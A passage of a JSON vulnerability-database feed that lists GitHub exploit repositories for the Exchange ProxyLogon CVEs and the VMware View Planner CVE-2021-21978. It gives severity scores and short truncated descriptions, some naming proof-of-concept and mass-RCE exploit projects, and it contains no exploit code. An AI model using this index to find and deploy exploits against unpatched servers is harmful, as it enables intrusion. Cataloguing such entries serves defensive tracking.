{"githubexploit": [{"lastseen": "2022-04-03T23:52:26", "description": "# CVE-2021-26855\nCVE-2021-26855 ssrf \u7b80\u5355\u5229\u7528\ngolang \u7ec3\u4e60\n\n## \u5f71\u54cd\u7248\u672c\nExc...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T08:39:05", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978", "CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-04-03T10:42:30", "id": "65D56BCD-234F-52E5-9388-7D1421B31B1B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-12T03:31:40", "description": "# CVE-2021-26855-PoC\nPoC exploit code for CVE-2021-26855. \n\nOrig...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T14:27:06", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-01-10T21:06:44", "id": "14573955-860C-5947-8F2F-86347A606742", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-03T01:15:35", "description": "# proxylogscan\n\n<img src=\"https://proxylogon.com/images/logo-whi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-08T11:54:32", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2022-03-02T15:41:34", "id": "13C8F5B4-D05E-5953-9263-59AE11CCD7DE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:24:19", "description": "# 106362522\n\u91dd\u5c0d\u8fd1\u671f\u5fae\u8edf\u516c\u5e03\u4fee\u88dc\u906d\u99ed\u5ba2\u653b\u64ca\u7684Exchange Server\u6f0f\u6d1e\u554f\u984c\uff0c\u53f0\u7063DEVCORE\u8868\u793a\u65e9\u57281\u67085...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-19T09:33:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-04-19T09:35:18", "id": "DFB437A9-A514-588D-8B48-A6C7C75EAD32", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-03T01:19:32", "description": "# ProxyLogon\n\nProxyLogon is the formally generic name for CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-16T07:31:25", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2022-03-02T19:09:09", "id": "B5E7199E-37EE-5CBA-A8B7-83061DD63E3D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-27T21:01:50", "description": "# proxylogon\n\nProof-of-concept exploit for CVE-2021-26855 and CV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-24T01:12:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-03-27T19:34:57", "id": "D7D704DD-277E-5739-BD5E-3782370FCCB3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:20:16", "description": "# CVE-2021-26855\nCVE-2021-26855, also known as Proxylogon, is a ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-11T19:35:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-11-16T01:46:59", "id": "27A663CD-2720-57DA-A38A-DF1FEE0D7124", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:20:36", "description": "# Exchange SSRF toRCE Exploit\n\n\n\n**:warning:For educational and ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-15T09:02:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-10-24T06:16:43", "id": "D6AC5402-E5BA-5A55-B218-5D280FA9EA0D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-28T14:00:56", "description": "# ProxyLogon For Python3\nProxyLogon(CVE-2021-26855+CVE-2021-2706...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-17T03:56:54", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-03-28T09:27:18", "id": "9C3150AA-6C0C-5DC4-BEAD-C807FA5ACE12", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-16T10:31:55", "description": "# Exch-CVE-2021-26855\nProxyLogon is the formally generic name fo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-14T14:23:34", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-02-16T09:48:52", "id": "B20A08C3-E06C-57C9-998A-C38174AEA7DC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:26:23", "description": "# ProxyLogon-Mass-RCE\n## Description\nPython for mass deploying p...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-23T17:09:30", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26857", "CVE-2021-26855"], "modified": "2021-05-23T17:23:03", "id": "D7D65B87-E44D-559F-B05B-6AED7C8659D5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:21:20", "description": "![](https://github.com/SCS-Labs/Images/raw/main/SCS%20-%20HAFNIU...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-11T21:18:29", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26855"], "modified": "2021-04-19T19:31:47", "id": "2481D5F6-C105-5158-B4AF-B67D7BA244A3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:20:04", "description": "# Exchange_IOC_Hunter\n\n#### Description:\n\nHunt for IOCs in IIS L...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T10:36:44", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26855"], "modified": "2021-03-17T10:22:07", "id": "F3D43FE5-47AE-591C-A2DD-8F92BC12D9A8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-15T01:18:31", "description": "### This project has been discontinued\n\nPlease use Microsoft too...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-05T08:22:07", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26858", "CVE-2021-26857", "CVE-2021-27065", "CVE-2021-26855"], "modified": "2022-02-14T23:14:09", "id": "37EE4A49-AEF7-5A71-AC1C-4B55CB94DD92", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-15T15:36:41", "description": "# CVE-2021-21978\nCVE-2021-21978 EXP\n\n# VMware View...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-05T04:33:19", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware View Planner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978"], "modified": "2021-12-15T14:41:35", "id": "0DF255CC-57A4-520A-B262-852C932A5B1A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-15T15:36:37", "description": "# CVE-2021-21978\nCVE-2021-21978 RCE exp\n\n\u5f71\u54cd\u7248\u672c\nVMware View Planne...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-05T03:58:33", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware View Planner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978"], "modified": "2021-12-15T14:41:35", "id": "3CA150A7-76FA-566E-A65C-9CE92B0C857A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-18T04:27:48", "description": "# CVE-2021-21978\n\u5e26\u56de\u663e\u7248\u672c\u7684\u6f0f\u6d1e\u5229\u7528\u811a\u672c\uff0c\u66f4\u7b80\u5355\u7684\u65b9\u5f0f\n\n## 0. \u6f0f\u6d1e\u4fe1\u606f\n>VMware View Pl...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-05T08:15:27", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware View Planner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978"], "modified": "2022-06-18T04:00:42", "id": "A5396B72-7F7D-5109-9A41-571016422FB5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:20:26", "description": "# I will continue to add any new code or modify existing code ba...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-06T04:47:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065"], "modified": "2021-11-25T15:07:14", "id": "7395180E-85B1-5253-9975-F93BE4693139", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-22T08:31:36", "description": "# poc_proxylogon\nMicrosoft Exchange ProxyLogon PoC (CVE-2021-268...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-04T22:38:30", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-02-22T05:29:04", "id": "81FEB23C-D090-5CE8-9B92-00BE597DE052", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-07T06:01:29", 